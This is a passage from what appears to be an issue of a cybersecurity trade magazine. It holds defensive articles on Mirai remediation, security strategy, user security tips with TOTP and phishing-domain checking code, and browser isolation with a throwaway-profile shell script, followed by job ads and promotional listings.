This has been a significant issue and an alarming trend. This attack alone garnered a mass of attention and press, cost the targets large amounts of money, and in some cases cost them their DDoS defense vendor as well.

Because the issue draws attention to the weak link, equipment manufacturers have started to review it. ZyXEL, for example, began investigating the vulnerability, which was traced to firmware from one of its chipset suppliers, EcoNet, for the RT63365 and MT7505 chipsets. As of December 2016, ZyXEL was working on a patch.

Another option is to place the equipment behind a firewall or NAT with no ports exposed to the internet; a device whose management port is reachable from outside is a target. A short-term yet effective remediation is to reboot the equipment: Mirai lives only in memory, so a reboot removes it. The catch is that an exposed device can be reinfected with little effort, often within minutes, so the reboot buys nothing lasting unless the port is closed. As an additional step, change the default password.

Vendors & IoT

There is a continuing problem where vendors and IoT security meet. These devices have overlooked security for years: insecure protocols, unsecured device communication, factory-default credentials and a host of other shortcomings.

The people devising attacks have clearly taken notice and are exploiting IoT devices left and right.

Summary

Only a few mass attacks have reached this level with such immediate devastation. A business can be attacked for no reason at all and suffer the detrimental effects.

About The Author

Charles Parker, II began coding in the 1980s. He is presently an Information Security Architect at a Tier One supplier to the automobile industry, and is completing a PhD (Information Assurance and Security), with the dissertation in progress. His interests include cryptography, SCADA, and securing communication channels.

He has presented at regional InfoSec conferences. Charles Parker, II can be reached online at charlesparkerii@gmail.com and InfoSecPirate (Twitter).

IT Security - Lost Cause?
Overcoming the Nightmare of Cyber Security
Robert Mills Blacksands Inc.

THE BATTLE IS LOST - BUT NOT THE WAR

My first IT security failure was experienced in the '80s when my modem-based AOL account started sending all my contacts malware. Over the years, working my way up to a CIO position, my problems with security only became exponentially worse. I don't need to explain how bad it has become; you know. You probably have similar war stories that you may or may not wish to share with others. We all share the scars of battle, the battle between the hackers and the protectors of data, IP and company integrity!

In the near future we will see quantum computers become more commonplace: machines that, at sufficient scale, could break today's public-key encryption (RSA, Diffie-Hellman and elliptic-curve schemes) in minutes. Billions of IoT devices with no effective way to set passwords or apply updates will exist and be connected to everything. Add terabytes of malware in the wild and, possibly more concerning, state-sponsored hackers who have more training and better tools than any company can match. Managing the plethora of stakeholders, using everything from IoT devices to BYOD home computers, is out of control. We are losing the battle, being overrun by malicious code, hackers and bad people.

I currently work with Strategy CIO, a premier boutique consulting company for high-end executive consultants, and I am a board member for several companies, one of which is Blacksands, Inc. Blacksands, Inc. is a software security company that has advanced endpoint management and security software. I have seen the capabilities of numerous companies in many industries and most simply do not have the skills, tools, infrastructure, governance or management of policies that it would take to even attempt to protect themselves, their IP or their data. The advanced companies that do have some of these things often have major holes and are often still at significant risk.

So why spend any money or put any resources in place if we are losing and there is no assurance? The answer is simple. If you lose and the hackers win, the cost and impact to your company can be staggering. Never give up, never surrender. At present, breaches are common and have a high probability of occurrence. It is your fiduciary responsibility to protect your company, its brand, its reputation and its assets to the best of your ability and resources. Even though middle management often resists providing the needed resources because of budget constraints or the need to meet month-end or year-end figures, the president, CEO and board will agree that securing the company, its data, intellectual property and integrity is imperative for medium- to long-term, and often short-term, survival.

SO WHAT TO DO

When you are losing a war, you need a better battle plan (security strategy), bigger weapons (better tools) and more troops. There is no single magic bullet. We need to dig in, fill in the holes, use stronger security technology and be better. Assess the good, the bad and the ugly, and work with business leadership to understand what is needed and, more importantly, why it is necessary.
1. Analyze what is working and what is not. Old, outdated security infrastructure simply cannot keep up with the latest threats.
2. Build a strategy that can protect your company from current and future threats. Ensure it is robust, fault tolerant and not dependent on human frailties. Use defense in depth. Don't settle for a system that is merely difficult to hack; aim for one that is near impossible.
3. Change what you are doing. Eliminate what is not protecting you. Add new technologies to stay in the game. Put processes and governance controls in place to make sure that your infrastructure is always online and working, and that changes do not create new vulnerabilities.
4. Do not assume you are smarter than the hackers or that commercial tools will automatically provide protection. Design on the assumption that any visible system will be attacked, and use strategy to thwart attacks before they happen. Always assume: if they can see it, they will try to hack it.

WHAT IS NOT WORKING

The current paradigm assumes that if you have a firewall on your network, passwords on everything and anti-malware on your computers, you have security. Nothing is farther from the truth. So many large, important companies have been hacked recently that the public is becoming complacent, almost numb to hearing about it. They all had some kind of IT security in place.

Examples of failures include:

1. Trusting that an employee will recognize a phishing email and not click is a lost cause.
2. Lacking protection against threats from your own disgruntled employees.
3. Passwords have reached old age. Assuming all users will choose unguessable passwords, or forcing complexity rules that make users write them on Post-it notes, is hopeless.
4. Social engineering is here to stay. We need to assume all people are subject to manipulation and design accordingly.
5. Firewalls with rules so complex that only one person in the business understands them. How is that reliable if no one is testing that they work as needed?
6. Antivirus tools that stop malware only after a few days of analysis. What happens during those few days between receipt, analysis and action?
7. Administrators with the ability to change anything at will, using passwords that only they know. Will this pass the litmus test during an audit?

8. Laptops, desktops, phones and numerous IoT devices with connections to uncontrolled hotspots over wire, WiFi, Bluetooth, Near Field and, soon, office lighting and satellites. This creates uncontrollable holes galore in a company's network security.
9. LAN networks with unknown mapping of ports and no ability to shut down ports showing suspicious behavior instantaneously.
10. Home computers (and devices, often with malware already embedded) that the company has given direct access into its networks.
11. BYOD requires tools, policy and the ability to protect the company from devices with weak protection and embedded malicious code.

Assuming logs and detection tools provide security. They only record what has gone wrong after the animals have left the barn. They are useful, great for post-analysis and testing, but they are not protection. A bit too late, don't you think?

WHAT IS WORKING

1. Automated stakeholder management, so that every user, device and app is managed.
2. Zero trust endpoint management.
3. Techniques that improve resistance to hacking: invisibility of endpoints, honeypots, secondary firewalls and data protection. These make systems really difficult to hack.
4. Two-factor authentication, including for individual users. It must be in place for each and every connection (phones, laptops, even IoT devices, on a threat-immune infrastructure).

Blacksands security is a great example of these capabilities.

5. Anti-malware software that uses heuristics to sense threats that have not yet been identified. Kaspersky is a good example of the use of heuristics.

6. Data protection: managing rules for what can and cannot be sent and received. This must include encryption of all data and filtering of what data can be received and sent. (Watch out for quantum computers: a few small ones already exist, and public-key algorithms will need to change sooner rather than later to resist quantum code-breaking.)

Microsoft has strong capabilities in the data protection space.

A PLAN TO COVER ALL

Most of the time the security staff is so busy bailing water there is no time to patch the holes, let
alone row faster.

1. Make sure you have the in-house skills and capacity to implement security properly. If not, train and/or hire. You cannot fight a war without trained soldiers.
2. Once you decide to make your business secure, you must commit to producing and executing a clear and effective security strategy. A security strategy is not what you think you should do; that is tactics. Strategy is a comprehensive plan to become better than you are.
3. Identify all the holes in your defenses and rate how well your current infrastructure can handle them against current and future threats.
4. Replace or re-architect everything that is weak. Do not put vulnerabilities on the back burner for a future budget. Explain to executive leadership that if they want to use technology they need to do it securely; they really do not have a choice. Be frugal but smart: cover all credible threats and mitigate all risks.
5. Ensure processes and governance are in place so that management of the security infrastructure is robust, tested regularly and has management controls to ensure every element is carried out.

Will this be 100% secure? Absolutely not, but it will be drastically better than before, and you will be demonstrating your due diligence to the board: that you have made every effort to protect the company's brand, intellectual property and assets, not to mention its reputation.

MAKE IT HAPPEN

Hire an expert to bring in methodology, teach your staff how to create and, most importantly, how to successfully execute a security strategy. This is not just paper but a process: organization, budget, management, governance, auditing, continuous improvement and a lot of hard work.
1. Make sure all the basics are solid, tested and have no holes.
2. Deploy zero trust endpoint management for every endpoint on every device and for every stakeholder. One approach is to make the edge invisible to the rest of the internet: to illegitimate entities, protected applications and devices appear to be disconnected. A perimeter that cannot be seen cannot be fingerprinted, and an attacker who cannot reach a service cannot exploit it. That sharply reduces exposure to scanning and application-level DoS, though it cannot stop an attacker from saturating the network link itself, and it makes even well-resourced state-sponsored assaults much harder.
3. Deploy management of every stakeholder and enforce two-factor authentication for all users, apps and servers. Stakeholder management provides simple, instant, local control and access only over secure connections, drastically improving the effectiveness of the security infrastructure.
4. Deploy data protection for all data. Make sure all sensitive data is encrypted and that tools are in place to control what can and cannot be exported from your company.
5. Make sure your anti-malware has heuristics. Heuristics look for malware that has not yet been identified and categorized. Make sure every device (including BYOD), inbound email, all imported data, USB, Bluetooth, WiFi, Near Field and Internet connections are screened for malware. Screen all data that is imported into your company from whatever source. Ensure your plan covers EVERYTHING. Think USB, hotspots; leave no stone unturned.
6. Re-architect your existing security based on what is needed, not what you have done in the past. If you always do what you always did, you will always get what you always got.
7. Put written processes, governance and controls in place to manage the human element.

This is your chance to gain a secure business enterprise and the only way to stand a chance to
win this war on data protection.

P.S. If you like this article, please share it!

References:
1. Zero trust endpoint management: http://blacksands.danati.com
2. Two-factor authentication: http://blacksands.danati.com
3. Stakeholder management: http://blacksands.danati.com
4. Data protection: https://www.microsoft.com/en-us/security
5. Heuristics: http://support.kaspersky.com
6. Security architecture: https://www.linux.com/news/nine-principles-security-architecture
7. Processes, governance and controls: http://www.iso27001security.com/html/27014.html

About the Author

Robert Mills is an award-winning IT executive consultant at Strategy CIO and was formerly a VP, Business Partner & CIO at General Electric and Smiths plc. He is currently a board member at Blacksands Security. Bob has an extensive network throughout the tech industry. Since becoming an executive consultant, Bob has been helping his select clients redefine how information technology drives their business to improve results. Bob has won recent InnoCentive challenges and was featured in Wired magazine's Sony Forum for the Future 2025. Bob does speaking engagements as a futurist and tech advocate.

Strategy CIO is a boutique consultancy that provides only top technology experts to select customers who want fast, consistently successful results. StrategyCIO.com

Blacksands is a software security company providing unique, low-cost, easy-to-use software with absolute access control and ultra-high security through its invisible edge technology. Blacksands.danati.com

Bob can be contacted at:

Rmills@strategycio.com or Bmills@blacksandsinc.com

Top 5 Cyber Security Tips Every Internet User Must Consider
Must-use tips for every internet user
by Anas Baig, Digital Security Enthusiast, Gaditek

Evolution affects every living thing equally, from the predator to the preyed upon. While internet users are getting smarter about their online security, the hackers are upping their game too. As with crime in the physical world, the rate of cyber crime is on the rise.

Given the alarming situation, it is only logical for people to arm themselves with solid security strategies and adopt the basic security fundamentals to remain as safe as possible on the internet. Here are five tips to help you avoid becoming the hunted:

1. Create & Use Complex Passwords

There is more to passwords than meets the eye, since they are your first line of defense. Sadly, 55% of internet users not only have weak passwords, they use the same password for all their online accounts, social and financial alike.

They don't change their passwords for months on end, which is an open invitation for hackers: compromise just one account and they get access to all the others.

My personal belief about passwords is: don't change your password regularly; just choose one good, strong password for different accounts. Make your password at least 12 characters long and include numbers, special characters (a variety of them) and mixed lower- and upper-case letters.

Last year, Keeper Security, a password management company, released a list of the most common passwords of 2016. The most popular password, making up nearly 17 percent of the 10 million passwords the company analyzed, was "123456". "password" was also in the top 10, coming in as the eighth most common on the list.

2. Use A VPN

A Virtual Private Network, or VPN, is a service that creates an encrypted connection, best visualized as a tunnel, between your computer and a server operated by the VPN provider, so that anyone snooping on the network in between (a public WiFi hotspot, for instance) sees only encrypted traffic.

A VPN also masks your real IP address behind the VPN server's address, so the sites you visit see the server, not you. Note what the tunnel does not do: it ends at the VPN server, where your traffic leaves as normal, so you are trusting the VPN provider with what you send instead of your ISP or the hotspot owner. Choose the provider accordingly.

3. Use Multi-Factor Authentication

Multi-factor (or two-factor) authentication is the best practice for securing access to your online accounts. Passwords can be compromised, and once they are, it is easy for criminals to gain access. Multi-factor authentication adds an extra step at login to verify your identity, whether an email confirmation, a text message sent to your phone, or a code from an authenticator app or hardware token. Codes generated on the device are stronger than SMS, which can be intercepted or redirected by SIM swapping. These procedures often spark protest from employees, but they are a great way to add a layer of security.
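Both this tip and the earlier article's call for two-factor authentication on every connection rest on the same mechanism when the second factor is an app-generated code: a time-based one-time password. The following Python is an added example for this page, not the author's code: it implements HOTP (RFC 4226) and TOTP (RFC 6238) with the standard library, checks itself against the RFC 6238 test vectors (the RFC's ASCII seed "12345678901234567890", SHA-1, 8 digits), and shows the server-side verification with a small clock-drift window and a constant-time comparison.

```python
"""Added example for this page (not from the article): RFC 4226 HOTP and
RFC 6238 TOTP, the scheme behind authenticator apps, checked against the
RFC 6238 test vectors."""
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """HOTP: HMAC the 8-byte big-endian counter, dynamically truncate to a
    31-bit integer, and keep the low `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, for_time, step=30, digits=6, t0=0):
    """TOTP: HOTP with the counter set to the number of time steps since t0."""
    return hotp(secret, (for_time - t0) // step, digits)


def verify_totp(secret, submitted, now, window=1, **kw):
    """Server side: accept the code for the current step or up to `window`
    steps either side to tolerate clock drift. Compare in constant time so a
    timing difference does not leak how many leading digits were right."""
    step = kw.get("step", 30)
    for drift in range(-window, window + 1):
        candidate = totp(secret, now + drift * step, **kw)
        if hmac.compare_digest(candidate, submitted):
            return True
    return False


# RFC 6238 Appendix B: ASCII seed, SHA-1, 8 digits, (Unix time, expected code).
RFC6238_SEED = b"12345678901234567890"
RFC6238_VECTORS = [(59, "94287082"), (1111111109, "07081804"),
                   (1111111111, "14050471"), (1234567890, "89005924"),
                   (2000000000, "69279037"), (20000000000, "65353130")]


def self_test():
    """True when every RFC 6238 vector reproduces."""
    return all(totp(RFC6238_SEED, t, digits=8) == code for t, code in RFC6238_VECTORS)


if __name__ == "__main__":
    print("RFC 6238 vectors ok:", self_test())
    print("current 6-digit code:", totp(RFC6238_SEED, int(time.time())))
```

The drift window is the part worth getting right: too small and users with a slightly wrong clock are locked out, too large and an intercepted code stays valid for longer. A real server should also record the last accepted counter per user and refuse any code for that counter or earlier, so a code seen once cannot be replayed inside the window.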

4. Keep Your System Up-To-Date

Cyber criminals are relentless and keep coming up with new ways to infiltrate systems, so it pays to make sure your operating system and browser have the latest security patches installed. To minimize the window of exposure, security updates must be applied as soon as they are released. When prompted to update your operating system software, just do it!

5. Keep Your Inbox Safe

Always enable email scanning in your antivirus. Don't trust attachments; in fact, you should always be careful when opening attachments or clicking links in any email. If it is unexpected or suspicious for any reason, don't click on it.

Double-check the URL of the website a link takes you to: bad actors often rely on spelling mistakes and look-alike characters to direct you to harmful domains.

Also, disable automatic previewing and never respond to email requests for personal or company account information. According to Trend Micro, 91% of advanced cyber attacks begin with email.
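Checking a link's domain by eye is exactly what look-alike domains are designed to defeat, so the check is worth automating. The following Python is an added example for this page, not from the article: it extracts the host from a URL, compares its registrable domain against a constructed list of domains you actually use, and flags near-misses using character look-alike folding (rn for m, 1 for l, 0 for o), a small edit distance, a trusted name buried inside a longer hostname, and non-ASCII or IDN labels. The known-domain list and the sample URLs are invented for the demonstration.

```python
"""Added example for this page (not from the article): flag look-alike
domains in links. KNOWN_DOMAINS and the sample URLs are constructed."""
from urllib.parse import urlsplit

KNOWN_DOMAINS = {"paypal.com", "example-bank.com", "mycompany.com"}

# Visual substitutions attackers rely on, folded before comparison.
# Heuristic: it also folds digits in legitimate names, which is acceptable
# because the folded form is only used to find near-misses, never to allow.
LOOKALIKES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def fold(domain):
    out = domain.lower()
    for bad, good in LOOKALIKES:
        out = out.replace(bad, good)
    return out


def levenshtein(a, b):
    """Edit distance with a single rolling row (O(len(b)) memory)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Crude 'last two labels' registrable domain; enough for .com-style names."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def classify_url(url, known=KNOWN_DOMAINS):
    """Return ("known", domain), ("lookalike", domain, reason) or ("unknown", domain)."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    domain = registrable(host)
    if domain in known:
        return ("known", domain)
    if not domain.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return ("lookalike", domain, "non-ASCII or IDN label")
    folded = fold(domain)
    for good in sorted(known):
        if folded == good or levenshtein(folded, good) <= 2:
            return ("lookalike", domain, good)
    for good in sorted(known):
        # trusted name used as a subdomain of something else: paypal.com.evil-login.net
        if good in host:
            return ("lookalike", domain, good)
    return ("unknown", domain)


# Constructed sample links, the kind that arrive in phishing mail.
SAMPLES = [
    "https://www.paypal.com/signin",
    "http://paypa1.com/login",
    "http://rnycompany.com/reset",
    "http://paypal.com.evil-login.net/x",
    "https://secure-login.net/",
    "https://p\u0430ypal.com/",   # Cyrillic 'a' in place of Latin 'a'
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", classify_url(url))
```

The registrable-domain step matters as much as the distance check: `www.paypal.com` is fine, but `paypal.com.evil-login.net` is registered to whoever owns `evil-login.net`, and the familiar name at the front is there only to fool a reader who stops scanning early.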

To Conclude

Safeguarding data is essential for all internet users. Remember, the internet is still evolving and remains in a vulnerable state. You might think your data is not important to hackers, but that is where you would be completely wrong.

The tips above might not make you bulletproof on the internet, but they will make it that much harder for a hacker to single you out.

About The Author

Anas Baig is a Digital Marketer & Security Enthusiast at Gaditek. He loves to read and write about digital security and privacy. If you are interested in tweets about marketing and security, follow him on Twitter at @anasbaigdm.

Protecting Government by Expecting the Worst
Browser isolation can kill even the stealthiest threats

The proverb "Hope for the best, but prepare for the worst" dates to the 1700s, but it applies perfectly to anyone trying to keep their organization safe from modern cybersecurity threats. Everyone should still invest in whatever detection and prevention systems they can, but know that at some point those will inevitably fail. The attacks are too numerous, and the adversaries too sophisticated, to think any differently.

Government has been at the center of this security maelstrom for years now, and while it constantly works to shore up its defenses, there have been numerous high-profile attacks, such as the breach at OPM, that were highly successful for the attackers. The problem for government is two-fold. First, the information it protects is extremely valuable to some adversaries, such as rival nation states, so it will always be in the crosshairs. Second, the government, like most organizations, built its defenses around the concept of a security perimeter. That may still work for physical security, but cybersecurity can no longer rely on that classic strategy.

In cybersecurity, the perimeter no longer exists. Almost every agency now has a significant part
of its workforce using desktop computers and laptops outside of the old firewall-protected
frontlines. Agencies that rely heavily on contractors have even more assets outside of their
direct control and protection. Any of those outside assets could become a pathway used by
attackers to get at the core data they want to steal.

Agencies and their federal contractors are all looking for new ways to secure assets working
outside of a known perimeter. For the contractors, being able to prove that they are doing
everything they can to secure those assets could mean the difference between a contract award
and having their bids rejected. For agencies, they simply cant afford any more high-profile
breaches.

What makes outside assets so insecure is that they often operate outside any firewall or network support structure. The only protection a laptop has against threats is whatever is installed locally. Unfortunately, one thing that is on virtually every endpoint is a browser, and it is the number one pathway used by malware to infect systems. So something that every system is sure to have is, by some estimates, implicated in almost 90 percent of all successful breaches.

To try to protect browsers, there are numerous programs designed to monitor systems and
detect malware, ranging from classic anti-virus tools to memory-resident scanners. They can be
highly successful, especially against low-level attacks, but all of them eventually miss something,
and that miss can open a doorway into a federal network. All of those prevention programs are
only listening to half of the classic phrase: they hope for the best, but don't also prepare for the
worst.

And that is where the newer technology of virtual isolation can be deployed to protect federal
assets and those of contractors operating outside of a firewall. Virtual isolation lets users
detect, analyze and destroy threats attempting to enter computers through their browsers,
while also providing a safety net that contains the damage and keeps a system secure even if
everything else fails. It expects the worst, that a threat will eventually slip past those
defenses undetected, and acts accordingly to protect the system even if it can't see the danger.

Virtual isolation uses virtualization to remove the threat window posed by browsers. Every
time a browser is launched, a new instance is created in a container that is kept separate from
the rest of the system and from other programs. The virtual browser behaves normally for the
user, who may not even realize that the program is running inside a protected container.

Any threat that tries to alter the browser can still be detected by whatever protection is active
on the system, so threats can be captured and analyzed if an organization wants that as part of
a threat intelligence program. However, virtual browser isolation also assumes that detection,
no matter how sophisticated, will eventually fail. An advanced threat may avoid detection and
change the browser program or its settings so that it can come back later and compromise the
system. That won't work when virtual isolation is on the job.

Every time a browser is closed, the entire container, including any undetected threats that may
be lurking there, is destroyed. Each time a user opens a browser, a brand-new instance is
created in an isolated container with nothing persisting from previous browser sessions. Virtual
isolation thus assumes that every browser instance has been compromised; it expects the
worst and acts accordingly.
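The per-session burn-down described above can be approximated at the data level with a small wrapper. The following is an added example for this edition, not code from Passages, Ntrepid or the author: it gives every launch a fresh, private profile directory (cookies, cache, downloads, settings) and deletes that directory when the browser exits, so nothing a compromised page writes into the profile survives to the next session. What it assumes is the editor's, not the article's: a POSIX sh with mktemp(1), Firefox's documented --profile flag and Chromium's --user-data-dir flag, and the names ephemeral_browse, profile_destroyed and EPHEMERAL_LAST_PROFILE are made up for the example. It is not process isolation: an exploit that breaks out of the browser process is outside what it protects, which is exactly the gap a container or VM boundary closes.

```shell
#!/bin/sh
# Ephemeral browser session: a fresh, private profile for every launch,
# destroyed when the browser exits. Editor's added example for this
# edition, not the Passages product. It confines *data* (profile, cookies,
# cache, downloads) to a throwaway directory; it does not confine the
# browser *process*, so it is the burn-down half of the article's model
# without the container half.
#
# Assumptions (not from the article): a POSIX sh with mktemp(1); Firefox
# honours "--profile DIR" and Chromium/Chrome honour "--user-data-dir=DIR".
# EPHEMERAL_LAST_PROFILE is this script's own variable, kept so a caller
# (or a test) can audit that the cleanup really happened.

# ephemeral_browse [browser] [browser arguments...]
#   Launches the browser (default: firefox) with a scratch profile and
#   deletes the profile when the browser exits, whatever the exit status.
ephemeral_browse() {
    browser="${1:-firefox}"
    if [ "$#" -gt 0 ]; then shift; fi

    if ! command -v "$browser" >/dev/null 2>&1; then
        printf 'ephemeral_browse: browser not found: %s\n' "$browser" >&2
        return 127
    fi

    # Private scratch directory, mode 700 so other local users cannot read
    # cookies or downloads while the session is alive.
    profile=$(mktemp -d "${TMPDIR:-/tmp}/ephemeral-browser.XXXXXX") || return 1
    chmod 700 "$profile"
    EPHEMERAL_LAST_PROFILE="$profile"

    # Point the browser at the scratch profile using its documented flag;
    # anything else (an unknown browser, a test harness) just gets HOME.
    case "${browser##*/}" in
        firefox*)
            set -- --new-instance --profile "$profile" "$@" ;;
        chromium*|chrome*|google-chrome*)
            set -- --user-data-dir="$profile" --incognito "$@" ;;
    esac

    # Run in a subshell so a signal trap can remove the profile even if the
    # session is killed. HOME and the XDG directories are redirected so that
    # anything ignoring the profile flag still lands in the scratch dir.
    # The if-form keeps a non-zero browser exit from aborting under set -e.
    if ( trap 'rm -rf "$profile"; exit 130' INT TERM HUP
         HOME="$profile" XDG_CONFIG_HOME="$profile/.config" \
         XDG_CACHE_HOME="$profile/.cache" XDG_DATA_HOME="$profile/.local/share" \
         "$browser" "$@" ); then
        status=0
    else
        status=$?
    fi

    # Burn it down: whatever the session wrote, detected or not, goes with it.
    rm -rf "$profile"
    return "$status"
}

# profile_destroyed: returns 0 if the last scratch profile no longer exists,
# 1 otherwise. A post-session check for a login script or a test.
profile_destroyed() {
    [ -n "$EPHEMERAL_LAST_PROFILE" ] && [ ! -e "$EPHEMERAL_LAST_PROFILE" ]
}
```

Run it as `ephemeral_browse firefox https://example.org` (or `ephemeral_browse chromium`). The wrapper cleans up on normal exit and on INT, TERM and HUP; a hard crash of the shell itself can still leave a directory behind, and the predictable ephemeral-browser.* name makes such leftovers easy to sweep from a login script. A container- or VM-based product spends the same wipe-on-exit logic on the process boundary rather than on a directory, which is what closes the escape path this wrapper leaves open.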

Using browser isolation keeps systems working outside of a firewall secure by isolating the
browser and burning it down after every use. Protection programs can still catch incoming
malware, but even if they don't, the rest of the system is not exposed to whatever the session
picked up. The protection is scoped to the browser: it does not stop a user from typing
credentials into a phishing page during the session, and its strength against a container escape
is only as good as the isolation boundary itself, so that container or VM layer needs the same
patching and hardening as anything else. In today's cybersecurity landscape, where battles are
fought without the benefit of a traditional perimeter, a robust technology like virtual isolation is
what keeps systems working outside of an agency safe from browser-borne threats, both the
ones you discover and the invisible ones you will never see.

About the Author

Lance Cottrell, Chief Scientist, Passages. Lance Cottrell founded Anonymizer in 1995,
which was acquired by Ntrepid (then Abraxas) in 2008. Anonymizer's technologies form the
core of Ntrepid's Internet misattribution and security products. As Chief Scientist, Lance
continues to push the envelope with the new technologies and capabilities required to stay
ahead of rapidly evolving threats. Lance is a well-known expert on security, privacy, anonymity,
misattribution and cryptography. He speaks frequently at conferences and in interviews. Lance
is the principal author on multiple Internet anonymity and security technology
patents. He started developing Internet anonymity tools in 1992 while pursuing a Ph.D. in
physics, eventually leaving to work on those technologies full time. Lance holds an M.S. in
physics from the University of California, San Diego and a B.S. in physics from the University of
California, Santa Cruz. He has served on the advisory board of the UCSD Libraries and the
American Public University IT Industry Advisory Council.

Cyber Security Solutions Architect

Early stage start-up with multiple job openings nationwide for Cyber Security Solution
Architects.

Market compensation. Equity!

CISSP
5+ years customer facing pre-sales/solution architect
Minimum of 10 POCs
5+ years Splunk experience
5+ years Cyber Security experience
Up to 50% travel

================================================================

Big Data Solutions Architect

Start-up with multiple job openings nationwide for Big Data Solution Architects.

Market compensation. Equity!

5+ years experience:
Solutions Architect
Minimum of 10 POCs
Distributed systems background
Hadoop
HDFS
Java
Python
Up to 50% travel

Candidates interested in either position should email mike@spyglasspartners.com or call
603-552-5152.

NSA Spying Concerns? Learn Counterveillance
Free Online Course Replay at www.snoopwall.com/free

"NSA Spying Concerns? Learn Counterveillance" is a 60-minute recorded online instructor-led
course for beginners who will learn how easily we are all being spied upon, not just by the NSA
but by cyber criminals, malicious insiders and even online predators who watch our children.
You will then learn the basics of the art of Counterveillance and how you can use new tools and
techniques to defend against this next-generation threat of data theft and data leakage.

The course has been developed for IT and IT security professionals including Network
Administrators, Data Security Analysts, System and Network Security Administrators, Network
Security Engineers and Security Professionals.

After you take the class, you'll have newfound knowledge and understanding of:

1. How you are being spied upon.
2. Why Counterveillance is so important.
3. What you can do to protect private information.

Course Overview:

How long has the NSA been spying on you?
What tools and techniques have they been using?
Who else has been spying on you?
What tools and techniques have they been using?
What is Counterveillance?
Why is Counterveillance the most important missing piece of your security posture?
How hard is Counterveillance?
What are the best tools and techniques for Counterveillance?

Your Enrollment includes:

1. A certificate for one free personal-use copy of the Preview Release of SnoopWall for
Android
2. A worksheet listing the best open and commercial tools for Counterveillance
3. Email access to the industry-leading Counterveillance expert, Gary S. Miliefsky, our educator
4. A certificate of achievement for passing the Concise-Courses Counterveillance 101 course

Visit this course online, sponsored by Concise-Courses.com and SnoopWall.com, at
http://www.snoopwall.com/free

Top Twenty INFOSEC Open Sources
Our Editor Picks His Favorite Open Sources You Can Put to Work Today

There are so many projects at SourceForge that it's hard to keep up with them. However, that's
not where we are going to find our growing list of the top twenty infosec open sources. Some of
them have been around for a long time and continue to evolve; others are fairly new. These are
the Editor's favorites that you can use at work, and some at home, to increase your security
posture, reduce your risk and harden your systems. While there are many great free tools out
there, these are open source, which means the code is available under a license (GPL, BSD,
Apache or a project-specific one, depending on the tool) that you should read and feel
comfortable with before deploying. For example, under copyleft licenses such as the GPL, if you
improve the code and distribute the result you are required to share your changes under the
same terms; permissive licenses do not require that, but every one of them has conditions
worth reading. Nothing proprietary here.

Here they are:

1. TrueCrypt.org - The Best Open Encryption Suite Available (Version 6 & earlier). Note that
TrueCrypt development ended in May 2014 and its authors advised against continued use;
VeraCrypt, the maintained fork, is the practical choice today.
2. OpenSSL.org - The Industry Standard for Web Encryption
3. OpenVAS.org - The Most Advanced Open Source Vulnerability Scanner
4. NMAP.org - The World's Most Powerful Network Fingerprint Engine
5. WireShark.org - The World's Foremost Network Protocol Analyser
6. Metasploit.org - The Best Suite for Penetration Testing and Exploitation
7. OpenCA.org - The Leading Open Source Certificate and PKI Management
8. Stunnel.org - The Long-Standing Open Source TLS Tunneling Proxy
9. NetFilter.org - The Linux Kernel Packet-Filtering Framework Behind iptables
10. ClamAV - The Industry Standard Open Source Antivirus Scanner
11. PFSense.org - The Very Powerful Open Source Firewall and Router
12. OSSIM - Open Source Security Information and Event Management (SIEM)
13. OpenSwan.org - The Open Source IPsec VPN for Linux
14. DansGuardian.org - The Award-Winning Open Source Content Filter
15. OSSTMM.org - Open Source Security Testing Methodology
16. CVE.MITRE.org - The Public Dictionary of Vulnerability Identifiers
17. OVAL.MITRE.org - The Standard Language for Host-Based Vulnerability and Configuration
Assessment
18. WiKiD Community Edition - The Best Open Two-Factor Authentication
19. Suricata - Next-Generation Open Source IDS/IPS Technology
20. CryptoCat - The Open Source Encrypted Instant Messaging Platform

Please do enjoy, and share your comments with us. If you know of others you think should
make our list of the Top Twenty Open Sources for Information Security, do let us know at
marketing@cyberdefensemagazine.com.

(Source: CDM)

National Information Security Group Offers FREE Techtips
Have a tough INFOSEC Question Ask for an answer and YE Shall Receive

Here's a wonderful non-profit organization. You can join for free, start your own local chapter
and so much more.

The best service of NAISG is their free Techtips. It works like this: you join the Techtips mailing
list. Then, of course, you'll start to see a stream of emails with questions and ideas about any
area of INFOSEC. Let's say you just bought an application layer firewall and can't figure out a
best-practices model for firewall log storage; you could ask thousands of INFOSEC experts in a
single email by posting your question to the Techtips newsgroup.

Next thing you know, a discussion ensues and you'll have more than one great answer. It's
NAISG.org's best kept secret.

So use it by going here:

http://www.naisg.org/techtips.asp

SOURCES: CDM and NAISG.ORG

SIDENOTE: Don't forget to tell your friends to register for Cyber Defense Magazine at:

http://register.cyberdefensemagazine.com

where they (like you) will be entered into a monthly drawing for the award-winning Lavasoft
Ad-Aware Pro, Emsisoft Anti-Malware and our new favorite system cleaner from East-Tec,
Eraser 2013.

Job Opportunities

Send us your list and we'll post it in the magazine for free, subject to editorial approval
and layout. Email us at marketing@cyberdefensemagazine.com

Free Monthly Cyber Warnings Via Email


Enjoy our monthly electronic editions of our magazines for FREE.

This magazine is by and for ethical information security professionals, with a twist on innovative
consumer products and privacy issues on top of best practices for IT security and regulatory
compliance. Our mission is to share cutting-edge knowledge, real-world stories and
independent lab reviews on the best ideas, products and services in the information technology
industry. Our monthly Cyber Warnings e-Magazines will also keep you up to speed on what's
happening in the cyber crime and cyber warfare arena, plus we'll inform you as next-generation
and innovative technology vendors have news worth sharing with you, so enjoy.

You get all of this for FREE, always, for our electronic editions.

Click here to sign up today and within moments you'll receive your first email from us with an
archive of our newsletters along with this month's newsletter.

By signing up, you'll always be in the loop with CDM.

